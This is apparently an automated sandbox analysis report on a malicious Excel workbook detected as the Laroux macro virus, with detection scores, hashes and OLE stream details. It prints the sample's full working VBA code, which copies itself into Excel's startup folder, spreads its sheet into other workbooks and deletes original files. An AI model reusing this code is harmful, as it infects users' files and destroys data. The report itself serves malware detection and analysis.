Create Interactive Tour

Windows Analysis Report
dC3q98RyMT.xlsx

Overview

General Information

Sample Name:	dC3q98RyMT.xlsx
Analysis ID:	800071
MD5:	d505487c157d4d2ea9d0ac7663f797a4
SHA1:	fdf45220a8bfef82c526f4cbfdd156849312a1bf
SHA256:	00202d063aafd6e4a01a437f97c5d8d2871d4c21973cbd99f74499d403955eca
Tags:	xlsx
Infos:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Machine Learning detection for sample

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2664 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

• AV Detection
• Compliance
• System Summary
• Hooking and other Techniques for Hiding and Protection

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: dC3q98RyMT.xlsx

Avira: detected

Multi AV Scanner detection for submitted file

Source: dC3q98RyMT.xlsx	ReversingLabs: Detection: 76%
Source: dC3q98RyMT.xlsx	Virustotal: Detection: 67%			Perma Link

Machine Learning detection for sample

Source: dC3q98RyMT.xlsx

Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

System Summary

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Source: dC3q98RyMT.xlsx	Stream path '_VBA_PROJECT_CUR/VBA/Kangatang' : found possibly 'ADODB.Stream' functions open, read, write
Source: mypersonnel.xls.0.dr	Stream path '_VBA_PROJECT_CUR/VBA/Kangatang' : found possibly 'ADODB.Stream' functions open, read, write
Source: dC3q98RyMT.xls.0.dr	Stream path '_VBA_PROJECT_CUR/VBA/Kangatang' : found possibly 'ADODB.Stream' functions open, read, write

Source: dC3q98RyMT.xlsx	OLE, VBA macro line: Sub Auto_Open()
Source: dC3q98RyMT.xlsx	OLE, VBA macro line: Sub Auto_Close()
Source: mypersonnel.xls.0.dr	OLE, VBA macro line: Sub Auto_Open()
Source: mypersonnel.xls.0.dr	OLE, VBA macro line: Sub Auto_Close()
Source: dC3q98RyMT.xls.0.dr	OLE, VBA macro line: Sub Auto_Open()
Source: dC3q98RyMT.xls.0.dr	OLE, VBA macro line: Sub Auto_Close()

Source: dC3q98RyMT.xlsx	OLE indicator, VBA macros: true
Source: mypersonnel.xls.0.dr	OLE indicator, VBA macros: true
Source: dC3q98RyMT.xls.0.dr	OLE indicator, VBA macros: true

Source: dC3q98RyMT.xlsx	ReversingLabs: Detection: 76%
Source: dC3q98RyMT.xlsx	Virustotal: Detection: 67%

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR5A7E.tmp

Jump to behavior

Source: dC3q98RyMT.xlsx	OLE indicator, Workbook stream: true
Source: mypersonnel.xls.0.dr	OLE indicator, Workbook stream: true
Source: dC3q98RyMT.xls.0.dr	OLE indicator, Workbook stream: true

Source: classification engine

Classification label: mal64.winXLSX@1/5@0/0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$dC3q98RyMT.xlsx

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: dC3q98RyMT.xlsx

Initial sample: OLE summary lastprinted = 2023-01-10 06:55:46

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	12 Scripting	Path Interception	Path Interception	1 Masquerading	OS Credential Dumping	1 File and Directory Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Data Obfuscation	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	12 Scripting	LSASS Memory	1 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
dC3q98RyMT.xlsx	77%	ReversingLabs	Document-Excel.Virus.Laroux
dC3q98RyMT.xlsx	68%	Virustotal		Browse
dC3q98RyMT.xlsx	100%	Avira	HEUR/Macro.Downloader.PWA.Gen
dC3q98RyMT.xlsx	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	800071
Start date and time:	2023-02-07 04:31:17 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Run name:	Without Instrumentation
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	dC3q98RyMT.xlsx
Detection:	MAL
Classification:	mal64.winXLSX@1/5@0/0
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .xlsx Changed system and user locale, location and keyboard layout to English - United States Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\~DFCAE982CA23539E76.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.860451201427658
Encrypted:	false
SSDEEP:	192:1t0ZLeWiXPcKW95c2osh/bx43AgdLSUXdTX8XVh+YiTYn7FrAdb13xG4jD+Q:whUJ8XVh+YiTYnVAR135jD+Q
MD5:	D8499140C6A8B90157EC3ACF45EF6A6E
SHA1:	CD7978677FE7443030FACEF207EF4C2736A356DE
SHA-256:	D5D32037356CEB5705C3E0530F201D3E48D7F2D4018A819005B7074E3FC8A0D2
SHA-512:	A4B85BCB2568F42383F674262DB5819D8664AE3FC9BFB0B415BE469F59795D5DE4E0FBA94CC00D0C310334D397FF324F685E3C454C3706C3AAB3ACF35A9A2CDD
Malicious:	false
Reputation:	low
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD98A3D888EB1457C.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	CE338FE6899778AACFC28414F2D9498B
SHA1:	897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
SHA-256:	4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
SHA-512:	6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\mypersonnel.xls

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Thanh An, Last Saved By: user, Name of Creating Application: Microsoft Excel, Last Printed: Tue Jan 10 06:55:46 2023, Create Time/Date: Wed Nov 16 01:40:05 2011, Last Saved Time/Date: Tue Feb 7 12:36:16 2023, Security: 0
Category:	dropped
Size (bytes):	735232
Entropy (8bit):	4.792890761970504
Encrypted:	false
SSDEEP:	12288:VMY0YUIMwSypJGih/kKxohmrjRJcFIcv1G2DqB8LyVsG16U4CDGA2Wfg1ow9dOAP:VMY0YUIM7yTGih/ksohmrjRJcFIcv1GW
MD5:	E30999019139C01E3FDFBE937BB36E65
SHA1:	AA1D946CDF62A9DA31144695F664C8B012651BBF
SHA-256:	F429452C69C65ACB06B0795A097946A308BF15229931C4500B3AFECB4E61284C
SHA-512:	D8DCF76452D645F791030B82D202FD0C0A305E33CD281CC50817D63C255B46D2769C8A94816A71E1A3BE15E0C946EF5FA4BCD7541EA4EACAFA211BA672A37C96
Malicious:	false
Reputation:	low
Preview:	......................>...................................u...................b.......d.......f.......h.......j...................................................................................................................................................................................................................................................................................................................................................................................................................t....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...c.......d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\dC3q98RyMT.xls

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Thanh An, Last Saved By: ADMIN, Name of Creating Application: Microsoft Excel, Last Printed: Tue Jan 10 06:55:46 2023, Create Time/Date: Wed Nov 16 01:40:05 2011, Last Saved Time/Date: Tue Jan 10 07:37:25 2023, Security: 0
Category:	dropped
Size (bytes):	732672
Entropy (8bit):	4.797018853850822
Encrypted:	false
SSDEEP:	12288:dMY0YUIMwb6lQNm3jqKfo7mUjRJccMfv1G2DqB8LyVsG16U4CDGA2Wfg1ow9dOAj:dMY0YUIMC6ONm3jqKo7mUjRJccMfv1Ga
MD5:	C98F6A9F7DC7618E737537B09AF0F4FA
SHA1:	826EE278E4319C9EDC0D244541820AE529D0B4A1
SHA-256:	C6BAB8365C95D0E2C38EBD5F856C1706BA6DE82F259EA08303AFF77D86B59C26
SHA-512:	4113962F6AE188B173F51128948FE665DBDD6AEDD2D33103469E9B50D835E2856A21E3B97F223B928B36B5EB8AFAE215146F5DF564C1C7251C532E721427312E
Malicious:	false
Reputation:	low
Preview:	......................>...................................t...................b.......d.......f.......h.......j...................................................................................................................................................................................................................................................................................................................................................................................................................s....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...c.......d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\~$dC3q98RyMT.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Reputation:	high, very likely benign file
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Thanh An, Last Saved By: ADMIN, Name of Creating Application: Microsoft Excel, Last Printed: Tue Jan 10 06:55:46 2023, Create Time/Date: Wed Nov 16 01:40:05 2011, Last Saved Time/Date: Tue Jan 10 07:37:25 2023, Security: 0
Entropy (8bit):	4.7970000308379275
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	dC3q98RyMT.xlsx
File size:	732672
MD5:	d505487c157d4d2ea9d0ac7663f797a4
SHA1:	fdf45220a8bfef82c526f4cbfdd156849312a1bf
SHA256:	00202d063aafd6e4a01a437f97c5d8d2871d4c21973cbd99f74499d403955eca
SHA512:	e61dbb0d05861d8cdb0b948447f4e591737c77dad9488615c54bd6c1ed12d0db10ab8a4133721e3ffa82f33cdb69a54bf57b870052084683bd62ccb58c3caa86
SSDEEP:	12288:KMY0YUIMwb6lQNm3jqKfo7mUjRJccMfv1G2DqB8LyVsG16U4CDGA2Wfg1ow9dOAj:KMY0YUIMC6ONm3jqKo7mUjRJccMfv1Ga
TLSH:	DFF452B6EF3FCCBAC934533811D216A82728D85886B2530732CDF5B479E7C516792A27
File Content Preview:	........................>...................................t...................b.......d.......f.......h.......j..............................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "dC3q98RyMT.xlsx"

Indicators

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Author:
Last Saved By:
Last Printed:	2023-01-10 06:55:46
Create Time:	2011-11-16 01:40:05
Last Saved Time:	2023-01-10 07:37:25
Creating Application:
Security:	0

Document Summary

Document Code Page:	-535
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	917504

Streams with VBA

VBA File Name: Kangatang.bas, Stream Size: 3761

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Kangatang
VBA File Name:	Kangatang.bas
Stream Size:	3761
Data ASCII:	. . . . . . . . T . . . . . . ( . . . : . . . . . . . . . . . . . . ` z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . $ . . . . . . 6 . . . . . . . . . . . . . . . . . L . . . . . L . . . . " . . . . . L . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 06 f0 00 00 00 54 05 00 00 d4 00 00 00 28 02 00 00 ff ff ff ff 3a 06 00 00 c6 0b 00 00 02 00 00 00 01 00 00 00 60 d5 7a 8c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 04 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Kangatang"

Sub Auto_Open()
Application.EnableCancelKey = xlDisabled


'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls"
Application.DisplayAlerts = False
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath Then
    Application.ScreenUpdating = False
    Windows(1).Visible = False
    ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\mypersonnel.xls"
    Windows(1).Visible = True
End If

    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "mypersonnel.xls!allocated"
End Sub

Sub Auto_Close()
On Error Resume Next
Application.DisplayAlerts = False
If Right(ThisWorkbook.Name, 4) <> "xlsx" Or Application.Version <= 11 Then Exit Sub
ThisWorkbook.SaveAs Filename:=ThisWorkbook.Path & "\" & Replace(ThisWorkbook.Name, ".xlsx", ".xls"), FileFormat:=xlExcel8, Password:="", WriteResPassword:="", ReadOnlyRecommended:=False, CreateBackup:=False
Kill ThisWorkbook.Path & "\" & Replace(ThisWorkbook.Name, ".xls", ".xlsx")
End Sub

Sub allocated()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "Kangatang" Then
    Application.ScreenUpdating = False
    currentsh = ActiveSheet.Name
    ThisWorkbook.Sheets("Kangatang").Copy before:=ActiveWorkbook.Sheets(1)
    ActiveWorkbook.Sheets(currentsh).Select
    Application.ScreenUpdating = True
 
 
 End If
End Sub

VBA File Name: ThisWorkbook.cls, Stream Size: 1158

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	1158
Data ASCII:	. . . . . . . . . < . . . . . . . . . . j . . . x . . . . . . . . . . . . . . ` Y . . # . . . . . . . . . . . . . . . . . < . . . . . 4 Y D . . : W . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . g ( C g x R P . . . . . . . . . . . . . . . . . . . . . . x . . . . . g ( C g x R P . . 4 Y D . . : W . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . 6 " . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0 . 0 . 0 . 0 . -
Data Raw:	01 16 01 00 06 00 01 00 00 3c 03 00 00 e4 00 00 00 10 02 00 00 6a 03 00 00 78 03 00 00 cc 03 00 00 00 00 00 00 01 00 00 00 60 d5 cd 59 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 3c 00 ff ff 00 00 ed c3 bd 0a 34 b3 59 44 96 05 15 3a 57 f2 b7 f9 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 107

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	107
Entropy:	4.184829500435969
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 1160

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	1160
Entropy:	3.732113077773643
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H O M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C N . T . 4 7 A . . . . . C N . T . 4 7 B . . . . . C N . T . 4 7 C . . . . . C N . T .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 1c 02 00 00 d8 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 68 00 00 00 0b 00 00 00 70 00 00 00 10 00 00 00 78 00 00 00 13 00 00 00 80 00 00 00 16 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 232

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	232
Entropy:	3.6000827454083706
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . d . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T h a n h A n . . . . . . . . . . . . A D M I N . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . E t $ . @ . . . H = . . @ . . . h a $ . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 b8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 74 00 00 00 0b 00 00 00 8c 00 00 00 0c 00 00 00 98 00 00 00 0d 00 00 00 a4 00 00 00 13 00 00 00 b0 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 707687

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	707687
Entropy:	4.804704869947504
Base64 Encoded:	True
Data ASCII:	. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . \\ . p . . . . g e o r g e B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . p . 2 8 . . . . . . . . @ . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 66 32 cd 07 c9 00 02 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 06 00 00 67 65 6f 72 67 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 345

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	345
Entropy:	5.2322872015374395
Base64 Encoded:	True
Data ASCII:	I D = " { A 5 6 C D B 5 A - 8 3 C 8 - 4 E 5 3 - B 7 F 1 - E 0 F 7 6 D 2 F D E 3 E } " . . M o d u l e = K a n g a t a n g . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 0 D 2 E 3 0 1 E 7 0 1 E 7 0 1 E 7 0 1 E 7 " . . D P B = " E E E C D D 0 1 E 5 0 1 0 2 0 2 0 2 0 2 0 2 " . . G C = " 0 C 0 E 3 F 5 F 4 3 7 C 4 4 7 C 4 4 8 3 " . . .
Data Raw:	49 44 3d 22 7b 41 35 36 43 44 42 35 41 2d 38 33 43 38 2d 34 45 35 33 2d 42 37 46 31 2d 45 30 46 37 36 44 32 46 44 45 33 45 7d 22 0d 0a 4d 6f 64 75 6c 65 3d 4b 61 6e 67 61 74 61 6e 67 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 71

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	71
Entropy:	3.1370569946123794
Base64 Encoded:	False
Data ASCII:	K a n g a t a n g . K . a . n . g . a . t . a . n . g . . . T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . . .
Data Raw:	4b 61 6e 67 61 74 61 6e 67 00 4b 00 61 00 6e 00 67 00 61 00 74 00 61 00 6e 00 67 00 00 00 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2910

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	2910
Entropy:	4.481772745804546
Base64 Encoded:	False
Data ASCII:	a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw:	cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00

